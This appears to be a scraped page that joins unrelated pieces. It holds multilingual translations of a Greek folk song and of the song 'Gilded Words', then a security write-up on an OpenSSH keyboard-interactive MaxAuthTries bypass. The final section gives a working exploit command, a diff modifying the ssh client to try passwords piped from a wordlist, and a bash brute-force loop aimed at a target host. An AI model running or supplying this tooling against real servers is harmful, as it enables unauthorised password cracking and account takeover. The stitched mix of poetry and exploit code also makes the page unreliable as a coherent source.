Once upon a time

 

Once upon a time

once upon a time, my dear, there was
a beautiful lady

a blond girl married too young
that waited for her husband day and night

and one Suterday night or it was Sunday
she begged from the sun and from the moon

“sun, light his way, moon
go and talk to him for me

He sails around on the seas
He fights the pirates and beats them

Under the sun, under the moon, under the rain
and he leaves me all alone and lonely”

“Galley bore to windward, despite the strong wind
It started a bloody fight

with a pirate ship
I saw fire and murders…”

Es War Einmal

Es war einmal mein Augenschein
eine hübsche vornehme Frau

Eine jungverheiratete blonde Tochter
erwartet ihren Mann von morgens bis abends

Eines Samstag Abends an einem Sonntag
bittet sie die Sonne den Mond

Liebe Sonne erleuchte ihn lieber Mond
geh und sprich zu ihm um meines Gefallens wegen

Er umwandert und umsegelt die Ozeane
umnäht die Piraten und zerstört sie

In der Sonne im Mond und im Regen
und mich lässt er einsam und allein

Eine Galeere läuft aus mit dem Nordwind
wirft sich in den Kampf und in den Streit

In einer Piratenzunft
sah ich ein Feuer brennen und einen Mord

Il était une fois

Il était une fois mon petit
une belle, une vrai dame mon chéri

Une fille blonde mariée très jeune
qui son Maître attend du matin au soir

Un samedi soir mon chéri, un dimanche
elle prie le soleil et la lune, mon ami

Mon soleil, ma lune éclairez le
allez et parlez lui de moi

Il voyage et navigue dans les archipels
Il tue les pirates et les détruit mon ami

Sous le soleil la lune et la pluie
et moi me laisse seul et triste

Sa galère est parti avec le vent du nord mon chérie
et il s’est jeté dans la bataille et la lutte mon chéri

Dans une brique de pirates
j’ai vu allumer le feu et les tueries

C’era una volta

C’era una volta, mio tesoro, c’era una volta
una signora, oh guarda, nobile e bella

Una fanciulla bionda una piccola sposa
aspetta da sera a mattina il suo signore

Un sabato sera amico una domenica
prega la luna amico la luna e il sole

Sole mio illuminalo luna mia
va’ e parlagli fallo per me ti prego

Incrocia e veleggia, amico, in alto mare
fa messe di pirati amico e li distrugge

Sotto la luna la pioggia e il sole
e lascia me abbandonata e sola

Una galea prese il largo, mio tesoro, con la tramontana
si gettò nella battaglia, mio tesoro, e nella mischia

In mezzo a un manipolo di pirati
vidi il lampo di un fuoco e un’uccisione

Det var en gång

Det var en gång, min kära, på den tiden
en vacker drottninglik dam ska jag berätta

En ljus flicka som gift sig ung
väntandes på sin man dag och natt

En lördagskväll, min vän, eller om det var söndag
bad hon till solen och till månen

“Solen, lys upp hans väg, månen,
gå och prata med honom åt mig är du snäll

Han seglar runt om haven min vän,
slåss och kämpar mot pirater

Under solen, under månen och i regnet
och lämnar mig alldeles ensam”

Galärskeppet styr, min kära, med nordanvinden
kastas in i striden och fejden

I en klan med pirater
såg jag eld, brand och mord

SirenSings-2

 

 

 

 

 

Gilded Words

*Deutsch*

Vergoldete Wörter auf einem Taschentuch,
Ich habe sie vorgestern gefunden beim Bummeln,
Die Tropfen auf dem Klee,
Unterrichteten dich über den Morgen und gestern,
jedoch durchquerte ich das finale Tor,
gebunden an die Fäden der Zeit

Die Schwalben plagten dich in Troja,
dort wo du verlorest eine Generation,
es wäre besser dein Name wäre Maria,
und wärest eine Näherin in der Röte,
anstatt mit dieser Kompanie zu leben,
und nicht den Stern des Mörders zu kennen

Viele sind verletzt zurück gekehrt,
aus der wilden Zahlung der Zeit,
In der Mitte der Strasse vier Winde,
haben sie plötzlich in einem Moment mitgenommen,
und sie fanden die ruhige Flamme,
und den Herzschmerz ohne Grund

Und wie die anderen waren sie auch verloren,
man fand sie auf dem Halbweg bellend,
übrig geblieben von dem alten Martyrium,
ein Hund der dürstet in der Nacht,
Frauen mit Metalllampen,
Selbtgespräche führend am Rand des Meeres

Und die Pechnelken tragen,
werden von Soldaten exekutiert,
Wie kann es sein,
daß dieses Jahrhundert die Zeiten, das Leben kopfstehen?
Wie sind das Schicksal und die Jahre vergangen,
ohne auf einen Poeten zu hören?

Wer löst das Gebinde der Welt?
Wer ist Partisan in den Bergen?
Wer schenkt Liebe und Gnade,
und zwischen den Blumen der Unterwelt wandert?

Vergoldete Wörter auf dem Gras,
wer wird sie finden für die nächste Generation?
Sie fesselten mich in der Enge und in den Gesetzen,
und als ein böser Tag anbrach,
Bogenschützen, eine Front und Legionen,
nahmen mich und warfen mich in einen Käfig,
und in den Kellern der Jahrhunderte die Gelddrescher
werfen die Würfel beim Glücksspiel

Ich forderte die großen Jagden,
und ich war nicht gerissen und gemein,
so machte ich deine Strafgerichte durch,
Du wirst mich finden in der Unterwelt der Menschen,
damit du mich wieder für mein Martyrium bestrafen wirst,
und wieder züchtigen wie einen Kriminellen.

*English*

Gilded words on a handkercher
I’ve found’em during my stroll the other day
a primer on the clover
teaching you about the tomorrows and the yesterdays
but I was crossing the ultimate gate
bound by times’ threads

The songbirds plagued you at Troy ¹
where you were wrung lost for a generation
it’d be better you were called Maria ²
and were a seamstress in Kokkinia
instead of living with this company
and not knowing the killer’s star

Many returned scarred
from times’ ruthless payoff
in the middle of the road four winds
took them on the spur of the moment for a promenade
and they found the uncurbed flame
and the heartache without a cause

And like the others them too were lost
they were found halfway howling
and the old martyrdom left only
a dog that thirsts during the night
women on a corner with carbide lamps
soliloquizing by the seaside

And the open people carrying camions
will unload in Kesariani ³.
How did it happen this century
and life flipped upside down?
How fate and years brought about
not listening to a poet?

Who unravels the world’s skein?
Who’s captain (partisan) in the mountains?
Who gives out love and grace
and among Hades’ myrtles he strolls?
Gilded words on the grass
who will find them for the next generation

I was tied down in bystreets and in rules
and as a wicked day dawned
archers, phalanxes and legions
took me and threw me in a cage
and in the underground, using centuries for dice
the money mongers are gambling

I was going for the big hunts
and as I wasn’t savvy and a rascal
I underwent your tribunals
Since in Hades you’ll find me
to sentence me again to martyrdom
and chastise me like a criminal

Taken from http://lyricstranslate.com/de/malamatenia-logia-malamatenia-logia-gilded-words.html#ixzz3m20NxNna

OpenSSH keyboard-interactive authentication brute force vulnerability (MaxAuthTries bypass)

OpenSSH has a default value of six authentication tries before it will close the connection (the ssh client allows only three password entries per default).

With this vulnerability an attacker is able to request as many password prompts limited by the “login graced time” setting, that is set to two minutes by default.

Especially FreeBSD systems are affected by the vulnerability because they have keyboard-interactive authentication enabled by default.

A simple way to exploit the bug is to execute this command:

ssh -lusername -oKbdInteractiveDevices=`perl -e 'print "pam," x 10000'` targethost

This will effectively allow up to 10000 password entries limited by the login grace time setting.

The crucial part is that if the attacker requests 10000 keyboard-interactive devices openssh will gracefully execute the request and will be inside a loop to accept passwords until the specified devices are exceeded.

Here is a patch for openssh-6.9p1 that will allow to use a wordlist and any passwords piped to the ssh process to be used in order to crack passwords remotely.

---snip---
diff openssh-6.9p1/sshconnect2.c openssh-6.9p1-modified/sshconnect2.c
 83a84,85
 > char password[1024];
 >
 510c512,517
 < authctxt->success = 1; /* break out */
 ---
 > printf("==============================================\n");
 > printf("*** SUCCESS **********************************\n");
 > printf("*** PASSWORD: %s\n", password);
 > printf("==============================================\n");
 > exit(0);
 >
 1376a1384,1385
 > char *devicebuffer;
 > int i;
 1386a1396,1405
 > devicebuffer = calloc(1, 200000);
 > if (!devicebuffer) {
 > fatal("cannot allocate devicebuffer");
 > }
 >
 > for (i=0;i<200000-2;i+=2) {
 > memcpy(devicebuffer + i, "p,", 2);
 > }
 > devicebuffer[200000] = 0;
 >
 1393,1394c1412
 < packet_put_cstring(options.kbd_interactive_devices ?
 < options.kbd_interactive_devices : "");
 ---
 > packet_put_cstring(devicebuffer);
 1408c1426
 < char *name, *inst, *lang, *prompt, *response;
 ---
 > char *name, *inst, *lang, *prompt;
 1410c1428
 < int echo = 0;
 ---
 > char *pos;
 1425a1444
 >
 1430a1450
 >
 1443,1449c1463,1469
 < echo = packet_get_char();
 <
 < response = read_passphrase(prompt, echo ? RP_ECHO : 0);
 <
 < packet_put_cstring(response);
 < explicit_bzero(response, strlen(response));
 < free(response);
 ---
 > packet_get_char();
 > if (fgets(password, 1024, stdin) == NULL)
 > exit(0);
 > if ((pos=strchr(password, '\n')) != NULL)
 > *pos = '';
 > printf("%s\n", password);
 > packet_put_cstring(password);
---snip---

After applying the patch you can use this shell script to make the password attack from a wordlist:

---snip---
#!/bin/bash
# run as:
# cat wordlist.txt | ./sshcracker.sh ssh-username ssh-target
#
while true
do
./ssh -l$1 $2
rc=$?; if [[ $rc == 0 ]]; then exit $rc; fi
echo Respawn due to login grace time...
done
---snip---

For example enter this command:

cat wordlist.txt | ./sshcracker.sh test 192.168.2.173

The attack has been tested against a new FreeBSD 10.1 system and older FreeBSD versions such as version 6.2.